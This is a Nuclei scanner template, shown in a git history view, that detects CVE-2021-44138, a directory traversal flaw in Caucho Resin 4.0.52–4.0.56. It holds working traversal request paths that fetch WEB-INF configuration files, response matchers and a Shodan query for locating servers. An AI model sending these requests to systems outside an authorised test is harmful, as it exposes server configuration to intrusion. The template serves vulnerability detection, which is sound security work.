nuclei-templates/http/cves/2021/CVE-2021-44138.yaml

47 lines
1.2 KiB
YAML
Raw Normal View History

2023-06-08 18:03:36 +00:00
id: CVE-2021-44138
info:
name: Caucho Resin >=4.0.52 <=4.0.56 - Directory traversal
author: carrot2
severity: high
description: |
There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.
reference:
- https://nvd.nist.gov/vuln/detail/cve-2021-44138
- https://github.com/maybe-why-not/reponame/issues/2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-44138
cwe-id: CWE-22
2023-06-10 03:36:28 +00:00
metadata:
shodan-query: html:"Resin"
verified: "true"
max-request: 2
tags: cve,cve2021,resin,caucho,lfi
2023-06-08 18:03:36 +00:00
2023-06-10 03:36:28 +00:00
http:
2023-06-08 18:03:36 +00:00
- method: GET
path:
- "{{RootURL}}/;/WEB-INF/web.xml"
- "{{RootURL}}/resin-doc/;/WEB-INF/resin-web.xml"
2023-06-10 03:36:28 +00:00
stop-at-first-match: true
matchers-condition: and
2023-06-08 18:03:36 +00:00
matchers:
- type: word
words:
- "<web-app"
- "</web-app>"
2023-06-10 03:36:28 +00:00
part: body
2023-06-08 18:03:36 +00:00
condition: and
2023-06-10 03:36:28 +00:00
- type: word
part: header
words:
- "text/xml"
- type: status
status:
- 200